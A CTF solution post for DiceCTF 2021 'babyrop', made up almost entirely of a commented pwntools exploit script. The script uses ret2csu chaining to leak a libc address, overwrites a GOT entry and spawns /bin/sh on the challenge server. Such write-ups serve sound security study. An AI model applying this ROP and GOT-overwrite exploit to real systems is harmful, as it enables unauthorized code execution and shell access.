[DiceCTF 2021] babyrop

2021. 2. 8. 11:57 — CTF/2021

# exploit.py
from pwn import *
#context.log_level = 'debug'

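# Target selection: local binary by default; `python3 exploit.py REMOTE`
# switches to the challenge server (pwntools parses bare KEY arguments
# into `args`). Default behaviour is unchanged from the original script.
if args.REMOTE:
    p = remote("dicec.tf", 31924)
else:
    p = process("./babyrop")
e = ELF("./babyrop")

# __libc_csu_init gadget pair used for ret2csu. The script addresses the
# binary at fixed 0x40xxxx offsets, so it is presumably non-PIE; re-check
# both addresses with `objdump -d babyrop` if the binary is rebuilt.
setcsu = 0x4011ca  # expected: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
csu = 0x4011b0     # expected: mov rdx,r14; mov rsi,r13; mov edi,r12d; call [r15+rbx*8]; ...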

def chaining(func, p1, p2, p3):
    """Build one ret2csu frame that calls ``*func`` with (p1, p2, p3).

    The layout assumes the newer __libc_csu_init gadget shape
    (rdx<-r14, rsi<-r13, edi<-r12d, call [r15+rbx*8]) -- confirm against
    the target binary's disassembly. With that shape, after ``setcsu``
    has popped six registers and returned into this frame, the words are:

      rbx=0, rbp=1  -> the gadget's call loop runs exactly once
      r12=p1        -> first argument; loaded via edi, so p1 is presumably
                       truncated to 32 bits (fine for GOT addresses / small ints)
      r13=p2        -> second argument (rsi)
      r14=p3        -> third argument (rdx)
      r15=func      -> address of a pointer to the callee (a GOT slot),
                       dereferenced as [r15 + rbx*8]
      csu           -> the mov/call gadget itself
      0             -> consumed by the gadget's trailing ``add rsp, 8``

    Returns the frame as bytes. Frames concatenate directly: the gadget's
    trailing six pops take their values from the next frame's first six
    words, and its ``ret`` lands on that frame's ``csu`` word.
    """
    words = (0, 1, p1, p2, p3, func, csu, 0)
    return b"".join(p64(word) for word in words)

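# Stage 1: 0x48 bytes of padding reach the saved return address, then four
# ret2csu frames run back to back:
#   write(1, GOT[write], 8)        -> leak write's libc address (8 raw bytes)
#   gets(GOT[gets]+0x10)           -> store "/bin/sh" in a writable GOT slot
#   gets(GOT[write])               -> overwrite write's GOT slot with a libc address
#   "write"(GOT[gets]+0x10, 0, 0)  -> now calls the overwritten slot with
#                                      rdi="/bin/sh", rsi=rdx=0
# NOTE(review): the slot at GOT[gets]+0x10 is clobbered by "/bin/sh", and
# gets() also writes a NUL terminator past the 8-byte address, i.e. into
# the low byte of the slot at GOT[write]+8. Both are harmless only if those
# entries are not used again -- verify against the binary's GOT layout.
payload = b'A'*0x48
payload += p64(setcsu)
payload += chaining(e.got['write'], 1, e.got['write'], 8)
payload += chaining(e.got['gets'], e.got['gets']+0x10, 0, 0)
payload += chaining(e.got['gets'], e.got['write'], 0, 0)
payload += chaining(e.got['write'], e.got['gets']+0x10, 0, 0)


def _send_via_gets(line):
    """sendline() a buffer that the target consumes with gets().

    gets() stops at the first newline, so a 0x0a byte anywhere inside the
    data (an address such as 0x..0a..) would silently truncate it and leave
    a partial ROP chain or a partial GOT overwrite behind. Fail loudly
    (log.error raises) instead of chasing an unexplained crash; re-run the
    exploit to get a different libc base.
    """
    if b"\n" in line:
        log.error("payload contains 0x0a; gets() would truncate it: %r" % line)
    p.sendline(line)


_send_via_gets(payload)

# write(1, GOT[write], 8) emits the raw 8-byte pointer. User-space libc
# addresses on x86-64 look like 0x00007f..., so take the 6 low bytes that
# end at the 0x7f marker and zero-extend them to 8 bytes.
leak = p.recvuntil(b"\x7f")[-6:]
write_addr = u64(leak.ljust(8, b'\x00'))
log.info("write_addr = 0x%x" % write_addr)

# Offsets are specific to the challenge's libc build. For any other target
# recompute them from ELF("./libc.so.6").symbols; with a mismatched local
# libc the final frame jumps to garbage. The symbol at LIBC_TARGET_OFF is
# called with rdi="/bin/sh", rsi=rdx=0 by the last frame -- confirm it is
# the intended function for the target libc.
LIBC_WRITE_OFF = 0x1111d0
LIBC_TARGET_OFF = 0x0e62f0
libc_base = write_addr - LIBC_WRITE_OFF
log.info("libc base = 0x%x" % libc_base)

system_addr = libc_base + LIBC_TARGET_OFF

# Stage 2: feed the two gets() frames, in chain order.
_send_via_gets(b"/bin/sh\x00")
_send_via_gets(p64(system_addr))

p.interactive()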

 

RTC
